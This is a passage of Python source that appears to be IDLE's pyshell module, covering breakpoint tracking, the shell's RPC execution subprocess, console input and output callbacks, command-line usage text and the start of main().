self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
def restart_line(width, filename): # See bpo-38141.
"""Return width long restart line formatted with filename.
Fill line with balanced '='s, with any extras and at least one at
the beginning. Do not end with a trailing space.
"""
tag = f"= RESTART: {filename or 'Shell'} ="
if width >= len(tag):
div, mod = divmod((width -len(tag)), 2)
return f"{(div+mod)*'='}{tag}{div*'='}"
else:
return tag[:-2] # Remove ' ='.
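# Illustrative values for restart_line (a sketch; the widths below are arbitrary examples):
#   restart_line(40, '')  -> '===========' + '= RESTART: Shell =' + '==========='  (exactly 40 chars)
#   restart_line(10, '')  -> '= RESTART: Shell'  (tag no longer fits, so the trailing ' =' is removed)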
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except TimeoutError:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except TimeoutError:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
console.write('\n')
console.write(restart_line(console.width, filename))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
if use_subprocess:
source = (f"__file__ = r'''{os.path.abspath(filename)}'''\n"
+ source + "\ndel __file__")
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.restart_subprocess()
self.checklinecache()
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if messagebox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
messagebox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
messagebox.showerror(
"Subprocess Connection Error",
"IDLE's subprocess didn't make connection.\n"
"See the 'Startup failure' section of the IDLE doc, online at\n"
"https://docs.python.org/3/library/idle.html#startup-failure",
parent=self.tkconsole.text)
def display_executing_dialog(self):
messagebox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "IDLE Shell " + python_version()
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("window", "_Window"),
("help", "_Help"),
]
# Extend right-click context menu
rmenu_specs = OutputWindow.rmenu_specs + [
("Squeeze", "<<squeeze-current-text>>"),
]
allow_line_numbers = False
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
OutputWindow.__init__(self, flist, None, None)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.sys_ps1 = sys.ps1 if hasattr(sys, 'ps1') else '>>> '
self.prompt_last_line = self.sys_ps1.split('\n')[-1]
self.prompt = self.sys_ps1 # Changes when debug active
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
squeezer = self.Squeezer(self)
text.bind("<<squeeze-current-text>>",
squeezer.squeeze_current_text_event)
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = StdInputFile(self, "stdin",
iomenu.encoding, iomenu.errors)
self.stdout = StdOutputFile(self, "stdout",
iomenu.encoding, iomenu.errors)
self.stderr = StdOutputFile(self, "stderr",
iomenu.encoding, "backslashreplace")
self.console = StdOutputFile(self, "console",
iomenu.encoding, iomenu.errors)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use text viewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
messagebox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
self.prompt = self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
self.prompt = "[DEBUG ON]\n" + self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = True
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = False
self.canceled = False
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = messagebox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "help", "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
# User code should use separate default Tk root window
import tkinter
tkinter._support_default_root = True
tkinter._default_root = None
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = True
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = False
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = False
self.canceled = True
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = False
self.endoffile = True
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
        # (but only if this is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
messagebox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
self.console.write(self.prompt)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def show_warning(self, msg):
width = self.interp.tkconsole.width
wrapper = TextWrapper(width=width, tabsize=8, expand_tabs=True)
wrapped_msg = '\n'.join(wrapper.wrap(msg))
if not wrapped_msg.endswith('\n'):
wrapped_msg += '\n'
self.per.bottom.insert("iomark linestart", wrapped_msg, "stderr")
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
self.ctip.remove_calltip_window()
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
import getopt
from platform import system
from idlelib import testing # bool value
from idlelib import macosx
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
elif not macosx.isAquaTk():
if TkVersion >= 8.6:
ext = '.png'
sizes = (16, 32, 48, 256)
else:
ext = '.gif'
sizes = (16, 32, 48)
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in sizes]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
                    # filename is actually a directory; disregard it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
